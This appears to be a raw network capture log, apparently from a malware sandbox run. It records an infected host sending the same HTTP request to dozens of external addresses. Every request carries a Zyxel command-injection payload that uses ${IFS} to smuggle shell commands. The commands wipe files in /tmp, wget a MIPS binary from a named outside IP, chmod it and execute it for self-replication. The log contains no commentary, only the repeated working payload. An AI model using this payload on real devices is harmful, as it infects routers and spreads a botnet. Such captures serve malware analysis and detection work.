                                            Jan 14, 2024 15:50:49.626919031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7022192.168.2.235459092.52.208.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626929998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7023192.168.2.2359028151.14.6.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.626961946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7024192.168.2.2349070171.52.165.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627007008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7025192.168.2.2348796146.82.176.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627022982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7026192.168.2.233473298.72.171.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627063990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7027192.168.2.23461688.219.145.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627262115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7028192.168.2.2335508200.203.165.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627283096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7029192.168.2.236004624.203.75.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627296925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7030192.168.2.2336708164.155.250.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627330065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7031192.168.2.23542288.92.237.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627357006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7032192.168.2.2359388183.156.134.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627393961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7033192.168.2.235213070.126.171.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627419949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7034192.168.2.234119023.178.207.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627446890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7035192.168.2.234174438.127.98.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627459049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7036192.168.2.233505435.37.240.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627506018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7037192.168.2.235392631.238.172.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627547026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7038192.168.2.2359718209.186.111.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627566099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7039192.168.2.233919874.131.78.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627612114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7040192.168.2.235136288.55.63.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627634048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7041192.168.2.2343674197.117.169.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627660990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7042192.168.2.2343444159.163.126.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627676964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7043192.168.2.2351884186.157.58.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627707958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7044192.168.2.233561065.59.243.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627727985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7045192.168.2.234898080.188.124.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627762079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7046192.168.2.234059299.255.245.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627774954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7047192.168.2.2352886134.83.101.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627799988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7048192.168.2.235850812.171.34.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627819061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7049192.168.2.2335970108.64.16.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627820015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7050192.168.2.2341406158.180.220.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627867937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7051192.168.2.2341884153.76.161.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627883911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7052192.168.2.2344758139.0.29.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627917051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7053192.168.2.235902091.165.35.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627954006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7054192.168.2.2342418153.110.13.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627960920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7055192.168.2.233348681.91.147.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.627974987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7056192.168.2.234118647.204.138.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628000021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7057192.168.2.234135818.66.66.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628016949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7058192.168.2.2348360175.40.222.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628050089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7059192.168.2.2349342149.204.158.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628088951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7060192.168.2.2334534186.195.12.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628134966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7061192.168.2.234820840.184.71.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628139019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7062192.168.2.233519052.172.224.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628169060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7063192.168.2.234559446.206.2.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628175974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7064192.168.2.234675888.147.129.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628204107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7065192.168.2.235403060.51.235.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628230095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7066192.168.2.23475988.128.35.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628292084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7067192.168.2.2354518221.198.151.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628302097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7068192.168.2.234829025.114.117.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628318071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7069192.168.2.2357030134.122.93.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628335953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7070192.168.2.233434844.140.255.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628401041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7071192.168.2.2359418157.173.235.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628415108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7072192.168.2.233943027.137.79.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628437996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7073192.168.2.234841651.196.239.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628456116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7074192.168.2.2338832131.118.32.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628487110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7075192.168.2.233497693.109.55.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628503084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7076192.168.2.2340612142.62.3.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628557920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7077192.168.2.2337754178.72.167.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628587961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7078192.168.2.23449644.247.62.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628588915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7079192.168.2.2350516164.123.193.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628617048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7080192.168.2.235909875.203.125.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628617048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7081192.168.2.2337894129.36.75.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628628969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7082192.168.2.2341492100.24.10.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628659010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7083192.168.2.2357062107.3.244.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628676891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7084192.168.2.234749218.55.131.189443
                                            TimestampBytes transferredDirectionData
